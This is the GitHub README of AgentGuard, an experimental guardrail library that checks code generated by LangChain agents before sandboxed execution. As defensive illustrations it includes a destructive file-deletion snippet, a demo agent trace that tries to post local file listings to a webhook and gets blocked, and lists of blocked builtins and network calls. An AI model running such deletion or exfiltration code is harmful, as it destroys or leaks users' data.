Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

24 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ›‘οΈ AgentGuard

Experimental security guardrails for LangChain agent code execution.

Warning

Alpha / Proof of Concept β€” This project is an experimental research tool, not a production-grade security boundary. Code execution is isolated in a Docker container with restrictive defaults, but see known limitations. Use it as an additional layer of defense, not as your only one.

CI PyPI Python License: MIT Code style: ruff


πŸ€” The Problem

Modern LangChain agents can generate and execute Python code autonomously. A single malicious prompt or hallucination can lead an agent to generate destructive code:

# An agent asked to "clean up temp files" might generate:
import os
import shutil
shutil.rmtree("/var/data/users")  # πŸ’€ Oops.

There is no native guardrail in LangChain to prevent this. AgentGuard adds pre-execution filters to catch obvious dangerous patterns before they run.


βœ… What It Does

AgentGuard wraps your agent's code execution tool in a 3-layer validation pipeline. Before any LLM-generated code runs, it must pass through all three layers:

flowchart TD
    A["πŸ€– LLM Agent generates code"] --> B{"πŸ” Layer 1: AST Validator"}
    B -->|"βœ… Pass"| C{"🌐 Layer 2: Network Filter"}
    B -->|"❌ Blocked"| E["πŸ›‘οΈ SecurityBlockedError\nβ†’ Agent self-corrects"]
    C -->|"βœ… Pass"| D{"🧠 Layer 3: Semantic Judge"}
    C -->|"❌ Blocked"| E
    D -->|"βœ… SAFE"| F["🐳 Docker Sandbox\nβ†’ Result back to Agent"]
    D -->|"❌ UNSAFE"| E

    style A fill:#4a9eff,color:#fff
    style B fill:#ff9f43,color:#fff
    style C fill:#ff9f43,color:#fff
    style D fill:#ff9f43,color:#fff
    style E fill:#ee5a24,color:#fff
    style F fill:#2ed573,color:#fff
Loading

If any layer blocks the code, the agent receives a descriptive error message and can self-correct β€” instead of crashing or failing silently.


πŸ›‘οΈ How It Works in Action

AgentGuard Demo

> Entering new AgentExecutor chain...

Thought: I need to read the local files and send them to a webhook.
Action: safe_python_repl
Action Input:
import os
import requests
files = os.listdir('.')
requests.post('https://webhook.site/test', json={"files": files})

Observation: [AgentGuard | AST Validator] πŸ”΄ BLOCKED β€” Forbidden import
detected: 'os'. Rewrite the code without the forbidden operation.

Thought: I am not allowed to use the 'os' module. I cannot fulfill this
request as it requires system access.
Final Answer: πŸ›‘ I am restricted from accessing the local file system or
sending data to external webhooks due to security policies.

πŸš€ Quick Start

pip install securellm-agentguard
from agentguard import SafePythonREPLTool, SecurityPolicy

# Define your security rules
policy = SecurityPolicy(
    allowed_modules=["pandas", "json", "math"],
    allowed_domains=["api.github.com"],
    use_semantic_judge=False,  # Set True + pass judge_llm for Layer 3
)

safe_repl = SafePythonREPLTool(policy=policy)

# Use it in your LangChain agent instead of PythonREPLTool
# agent = create_react_agent(llm=your_llm, tools=[safe_repl])

With Layer 3 (optional β€” any LangChain-compatible LLM):

from langchain_google_genai import ChatGoogleGenerativeAI  # or ChatOpenAI, ChatAnthropic, etc.

judge_llm = ChatGoogleGenerativeAI(model="gemini-2.0-flash")
safe_repl = SafePythonREPLTool(policy=policy, judge_llm=judge_llm)

Note: Layer 3 works with any BaseChatModel β€” Gemini, GPT-4, Claude, Mistral, Ollama, etc.


πŸ–₯️ Live Web Demo

AgentGuard comes with a built-in FastAPI dashboard to visually test security policies against malicious code in real-time.

# Ensure dev dependencies are installed
poetry install --with dev

# Export your API key for the Semantic Judge (Layer 3)
export GEMINI_API_KEY="your_api_key_here"

# Start the dashboard
poetry run uvicorn demo.app:app

Then open http://localhost:8000 in your browser.


βš™οΈ SecurityPolicy Options

Parameter Type Default Description
allowed_modules list[str] ["math", "json", ...] Whitelisted Python modules
allowed_domains list[str] [] (block all) Whitelisted network domains
use_semantic_judge bool True Enable LLM semantic analysis
execution_timeout int 10 Max execution seconds

πŸ”’ Security Layers in Detail

Layer 1 β€” AST Static Validator

Uses Python's native ast module to parse the code without executing it.

Blocks:

  • Any import not explicitly whitelisted in allowed_modules
  • from X import Y style imports of non-whitelisted modules
  • Dangerous built-in calls: exec, eval, compile, open, __import__
  • Common escape vectors: getattr, setattr, delattr, globals, locals

Speed: ~0.1ms β€” no I/O, no network, pure AST traversal.

Layer 2 β€” Network Filter

Uses regex patterns to detect outbound network calls and validates target domains against the whitelist.

Detects:

  • requests.get/post/put/delete/patch/head
  • httpx and aiohttp calls
  • urllib.request.urlopen and urlretrieve
  • Raw socket.connect() calls
  • Bare URL literals (https://...)

Note: This is a heuristic regex-based filter, not an OS-level network control. Sophisticated obfuscation may evade it β€” Layer 3 exists to catch what Layers 1 & 2 miss.

Layer 2.5 β€” Heuristic Triage (Fast Triage)

A fast, regex-based heuristic scanner that calculates a suspicion score for the code. It looks for sensitive keywords (password, token, etc.) and risky operations. If the score is 0 (completely benign code), this layer bypasses the LLM Judge entirely, drastically reducing latency and API costs. This behavior is enabled by default via triage_skip_llm.

Layer 3 β€” Semantic Judge (LLM)

For subtle attacks that evade static analysis (e.g. a loop that deletes files one-by-one), the code is sent to a fast LLM (e.g. gemini-2.0-flash) with a strict binary prompt. Session-Level Context: The judge receives the agent's recent execution history, allowing it to detect multi-step escalation attacks.

Verdict: Only code classified as SAFE passes. Anything else (including ambiguous responses) is blocked β€” fail-closed by design.

Note: The LLM judge is a probabilistic defense β€” it can be wrong. It also sends code to a third-party API. Use it as an additional signal, not as a guarantee.

Docker Sandbox Execution (v0.2)

Code that passes all 3 layers runs in a short-lived Docker container with restrictive defaults:

  • No network β€” --network none
  • Read-only filesystem β€” --read-only with a small writable /tmp
  • Non-root user β€” runs as nobody (UID 65534)
  • All capabilities dropped β€” --cap-drop ALL, --security-opt no-new-privileges
  • Resource limits β€” configurable CPU, memory, PID, and output-size caps
  • Fail-closed β€” if Docker is unavailable, execution is refused (no fallback to in-process exec())
  • Killable timeout β€” the container is forcibly terminated on timeout

Requirement: Docker must be installed and running. Install it from docker.com.


πŸ“‹ Audit Trail

AgentGuard can log every execution decision as a structured JSON event β€” useful for compliance, debugging, and security monitoring.

from agentguard import SafePythonREPLTool, SecurityPolicy, AuditLogger, JsonFileHandler

# Log to a JSONL file (one JSON object per line)
audit = AuditLogger(handlers=[JsonFileHandler("agentguard.log")])
tool = SafePythonREPLTool(policy=SecurityPolicy(), audit=audit)

Each event records:

  • Verdict β€” ALLOWED, BLOCKED, TIMEOUT, ERROR, or SANDBOX_UNAVAILABLE
  • Blocking layer β€” which layer blocked the code (ASTValidator, NetworkFilter, SemanticJudge)
  • Timing β€” wall-clock execution time in milliseconds
  • Session ID β€” groups events from the same tool instance
  • Policy hash β€” fingerprint of the active security policy

Built-in handlers: JsonFileHandler (JSONL file), StdoutHandler (stderr), CallbackHandler (custom function for webhooks/SIEM).

Zero overhead when disabled β€” if you don't pass an audit parameter, nothing happens.


⚠️ Known Limitations

This is an alpha-stage research project. The following limitations are known:

Limitation Detail
Docker is required Code execution requires a running Docker daemon. The sandbox fails closed if Docker is unavailable.
Regex-based network filter The network filter is heuristic. Obfuscated URLs or dynamically-constructed network calls will not be caught by Layer 2.
LLM judge is probabilistic The semantic judge can be wrong, manipulated, or bypassed. It also sends code to a third-party API.
Image trust The default image is python:3.11-alpine. Production deployments should pin to a reviewed digest.

πŸ“ Project Structure

agentguard/
β”œβ”€β”€ agentguard/
β”‚   β”œβ”€β”€ __init__.py              # Public API exports
β”‚   β”œβ”€β”€ policy.py                # SecurityPolicy (Pydantic model)
β”‚   β”œβ”€β”€ audit.py                 # Structured Audit Trail logger
β”‚   β”œβ”€β”€ exceptions.py            # SecurityBlockedError
β”‚   β”œβ”€β”€ sandbox.py               # DockerSandboxExecutor (v0.2)
β”‚   β”œβ”€β”€ validators/
β”‚   β”‚   β”œβ”€β”€ ast_validator.py     # Layer 1: Static AST analysis
β”‚   β”‚   β”œβ”€β”€ network_filter.py    # Layer 2: Network domain filter
β”‚   β”‚   └── heuristic_triage.py  # Layer 2.5: Fast triage to skip LLM
β”‚   β”œβ”€β”€ judges/
β”‚   β”‚   └── gemini_judge.py      # Layer 3: LLM semantic judge (context-aware)
β”‚   └── tools/
β”‚       └── langchain_tool.py    # SafePythonREPLTool (LangChain BaseTool)
β”œβ”€β”€ benchmarks/
β”‚   β”œβ”€β”€ runner.py                # Adversarial benchmark runner
β”‚   └── suite.py                 # 40 attack cases across 8 categories
β”œβ”€β”€ tests/                       # Pytest suite + Docker integration tests
β”œβ”€β”€ examples/
β”‚   β”œβ”€β”€ basic_agent.py           # Simple agent + AgentGuard demo
β”‚   └── threat_intel_demo.py     # Threat analysis agent demo
β”œβ”€β”€ pyproject.toml               # Poetry config + metadata
β”œβ”€β”€ .github/workflows/ci.yml     # GitHub Actions CI
└── README.md

πŸ—ΊοΈ Roadmap

  • 3-layer validation pipeline (AST + Network + Semantic Judge)
  • LangChain BaseTool integration
  • Timeout enforcement
  • GitHub Actions CI
  • PyPI Publication β€” pip install securellm-agentguard
  • Live Web App / Dashboard β€” a static browser app to visually test AgentGuard policies
  • Visual Demo β€” animated GIF showing AgentGuard blocking and auto-correcting in real-time
  • Docker Sandbox Isolation (v0.2) β€” fail-closed container execution with no network, read-only FS, non-root, resource limits
  • Domain allowlist hardening β€” fixed suffix-matching vulnerability
  • CLI Support β€” run AgentGuard locally on Python scripts (e.g., agentguard check script.py)
  • Adversarial Test Suite β€” sandbox escape tests, obfuscation tests, resource abuse tests
  • Logging & Audit Trail β€” structured logs of every blocked/allowed execution
  • Plugin System β€” custom validator layers via a simple interface
  • LangSmith Integration β€” trace security events in LangSmith

🀝 Contributing

Contributions are welcome! Please read CONTRIBUTING.md first.

πŸ” Security

Found a vulnerability? Please read SECURITY.md for responsible disclosure instructions.

πŸ“„ License

MIT β€” see LICENSE.


Built by Thomas LEON Β· Emerging Technologies & Threat Intelligence

About

πŸ›‘οΈ Experimental security guardrails for LangChain agent code execution (Alpha)

Topics

Resources

Contributing

Security policy

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages